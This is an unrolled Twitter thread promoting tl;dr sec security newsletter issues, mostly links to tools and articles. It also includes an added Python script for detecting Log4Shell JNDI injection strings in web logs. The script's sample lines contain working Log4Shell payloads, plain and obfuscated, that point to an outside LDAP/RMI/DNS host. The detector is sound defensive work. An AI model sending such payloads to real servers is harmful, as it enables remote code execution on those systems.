📚 tl;dr sec 113

* Log4Shell resources
* @JubbaOnJeans, @yashvi3r Security metrics
* How @netflix scales cloud detections
* @orange_8361 CTF challenges
* @prince_of_pasta Least privilege IAM
* Free @falco_org 101 course
* and more!

tldrsec.com/blog/tldr-sec-…
📢 Sponsor: @goteleport Teleport 8 delivers industry best practices for remotely accessing Windows and Linux servers, databases, Kubernetes clusters, and internal web applications via a single secure, highly available endpoint. Learn more goteleport.com/blog/rdp-acces…
Boring AppSec: an awesome #AppSec newsletter by @JubbaOnJeans
boringappsec.substack.com

@mattomata Zero-friction “keyless signing” with Github Actions
chainguard.dev/posts/2021-12-…

Building Trust in the Software Supply Chain w/ Binary Transparency
binary.transparency.dev
@yevgenypats Enforce #privacy & security on Windows/macOS
Privacy.Sexy

@jdbiersdorfer How to Use Your Phone’s Privacy Tools
nytimes.com/2021/12/08/tec…

Protect your browsing history from Verizon
theverge.com/2021/12/5/2281…

@signalapp video calls support 40 people
signal.org/blog/how-to-bu…
@yakczar Easily and securely send files and folders from one computer to another
github.com/schollz/croc

@danirukun Integrating Emacs with Siri Shortcuts
danpetrov.xyz/macos/emacs/li…

Ok, now a bunch of #Log4Shell resources 👇

I know, I wish I could avoid it too
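The Log4Shell resource tweets themselves did not survive the unroll, so here is an added example that is not from the thread or from any of the linked resources: a small Python triage script that normalizes the lookup-nesting obfuscations seen in the wild (`${lower:…}`, `${upper:…}`, and the `${…:-default}` fallback form, which Log4j resolves to the default when the prefix cannot be looked up) before matching `${jndi:<scheme>:…}`. The access-log lines and IP addresses are constructed for illustration.

```python
import re

# Constructed sample access-log lines for illustration (not real traffic).
# Lines 0-3 carry a JNDI lookup in the User-Agent field; 4-5 are benign.
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:01 +0000] "GET /login HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7/x}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7/y}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${env:NOPE:-j}ndi:dns://198.51.100.7/z}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /static/app.js HTTP/1.1" 200 "-" '
    '"Mozilla/5.0"',
    '10.0.0.10 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" '
    '"curl/7.79"',
]

# An innermost ${...} expression: one with no further ${ or } inside it.
_INNER = re.compile(r'\$\{([^${}]*)\}')

# JNDI lookup after normalization; the scheme is what the JNDI provider dials out with.
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:', re.IGNORECASE)
JNDI_SCHEMES = {'ldap', 'ldaps', 'rmi', 'dns', 'iiop', 'corba', 'nds', 'nis'}


def _resolve(expr: str) -> str:
    """Evaluate one innermost lookup roughly the way Log4j's substitutor would.

    ${lower:X} / ${upper:X} change case; ${prefix:name:-default} with an
    unresolvable prefix (e.g. ${::-j}, ${env:NOPE:-j}) yields the default.
    Anything else (jndi:, date:, ...) is left intact so the detector can see it.
    """
    kind, _, arg = expr.partition(':')
    kind = kind.strip().lower()
    if kind == 'lower':
        return arg.lower()
    if kind == 'upper':
        return arg.upper()
    if ':-' in expr:
        return expr.split(':-', 1)[1]
    return '${' + expr + '}'


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookups inside-out until nothing changes.

    max_rounds bounds the work so a pathological input cannot spin forever.
    """
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def scan_line(line: str):
    """Return a finding dict for a line carrying a JNDI lookup, else None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    scheme = m.group(1).lower()
    return {
        'scheme': scheme,
        'known_jndi_scheme': scheme in JNDI_SCHEMES,
        'obfuscated': norm != line,  # nested lookups had to be unwrapped to reveal it
        'normalized': norm,
    }


def scan(lines):
    """Scan many lines; returns (index, finding) pairs for hits only."""
    hits = []
    for i, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            hits.append((i, finding))
    return hits


if __name__ == '__main__':
    for i, f in scan(SAMPLE_LINES):
        tag = 'obfuscated' if f['obfuscated'] else 'plain'
        print(f"line {i}: jndi:{f['scheme']} ({tag}) -> {f['normalized']}")
```

This is a triage heuristic, not a faithful emulation of Log4j's lookup grammar: other lookups and encodings can be layered on, and a payload can arrive in any logged field (headers, usernames, query strings), not just the User-Agent. Treat hits as a reason to check the host's outbound LDAP/RMI/DNS traffic from that timestamp, and treat patching or removing the JndiLookup class as the actual fix.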
If you liked this thread, check out tl;dr sec, a weekly newsletter I send out with:

📚 Summaries of great security talks
🛠️ The latest tools and useful blog posts
🧪 My various research projects

Thanks for reading, have a great day! 😎

tldrsec.com

More from @clintgibler

28 Oct
📚 tl;dr sec 107
* @rung Attacking and securing CI/CD pipelines
* @xntrik Threat modeling in HCL
* @NCCGroupInfosec Cracking random number generators w/ML
* @kottireethi GitHub Actions security best practices
* @pdnuclei Easily validate leaked API tokens

tldrsec.com/blog/tldr-sec-…
📢 Sponsor: Join @Tenable, @awscloud, @techmahindracsr, & more at #Accurics Code to Cloud Security Summit on Wed. Nov 10 @ 8:30am PST. If you’re in the US, register by Fri. to receive a FREE snack box. Preparing for tomorrow’s security challenges today. hopin.com/events/executi…
Tool for secret management at @elastic
github.com/elastic/harp

Repo of Google's security advisories and accompanying PoCs
github.com/google/securit…

@xntrik: Document your threat models in HCL
github.com/xntrik/hcltm

@daniel_bilar With 👆, you can now lint your TMs with Semgrep
14 Oct
📚 tl;dr sec 105
* #DevSecOps - @NIST on microservices + service mesh
* @ErmeticSec Defending S3 from ransomware
* @falco_org labs
* Risk-Based Security Decision Making at @netflix
* @brutelogic XSS exercises
* @trailofbits osquery + macOS EndpointSec

tldrsec.com/blog/tldr-sec-…
📢 Sponsor: Learn how “Detection-as-Code” is changing how security teams write, test and harden detections. blog.runpanther.io/detections-as-…
Risk-Based Security Decision Making at @netflix
eventbrite.com/e/risk-based-s…

@ztgrace A tool for detecting default and backdoor creds
github.com/ztgrace/change…

@omer_gil Bypassing required reviews using GitHub Actions
medium.com/cider-sec/bypa…
7 Oct
📚 tl;dr sec 104
* New Phrack
* @hakluke, @farah_hawaa 10 often missed web vulns
* @_fel1x C/C++ semantic search tool
* @black2fan, @s1r1u5_ Finding prototype pollution at scale
* @r2cdev Securing your GitHub Actions
* @alex_dhondt Exploiting drones

tldrsec.com/blog/tldr-sec-…
📢 Sponsor: The DevSecGuide to Infrastructure as Code:
🔬 Research on the state of IaC security
🦋 Practical steps for embracing a DevSecOps culture
🔐 Tips for embedding security throughout the DevOps lifecycle
➡️ Download for free from @bridgecrewio
bridgecrew.io/resource/the-d…
28 Jan
📚 tl;dr sec 68
* >5K subscribers! 🤯
* How AWS secures Lambda
* @DanielMiessler primer on @TomNomNom's recon tools
* @infosec_au Blind SSRF chains
* @RachelTobac InfoSec sea shanty
* @bradgeesaman Creating least priv custom roles in GCP

tldrsec.com/blog/tldr-sec-…
📢 Sponsor: Go beyond the network - detect and block malicious actors, not just malicious IPs, with @SqreenIO’s RASP. Schedule your demo today sqreen.com/rasp
@cryptogangsta Bypassing Signature Checks with Electron
parsiya.net/blog/2021-01-0…

SANS Virtual Summits FREE in 2021
sans.org/blog/sans-virt…

@IncludeSecurity Writing custom static analysis rules in Brakeman and Semgrep
blog.includesecurity.com/2021/01/ruby-s…
8 Jan 20
📚 tl;dr sec 19
* @shehackspurple & @j_opdenakker on getting into security
* Google's BeyondProd & code provenance (thx @MayaKaczorowski)
* Cloud, API, and file access bug security tools

... and I've got something big planned next week, stay tuned 🤫

tldrsec.com/blog/tldr-sec-…
Static analysis tools to find security issues in:

🌎Terraform scripts:
* github.com/liamg/tfsec
* github.com/bridgecrewio/c…
* github.com/cesar-rodrigue…

☁️CloudFormation templates:
* github.com/Skyscanner/cfr…
* github.com/stelligent/cfn…

Other #security tools:

Docker container that wraps 7 other #AWS security tools:
github.com/z0ph/aws-secur…

Automatic API attack tool that takes API specs as input:
github.com/imperva/automa…

Finding file access bugs:
github.com/google/path-au…
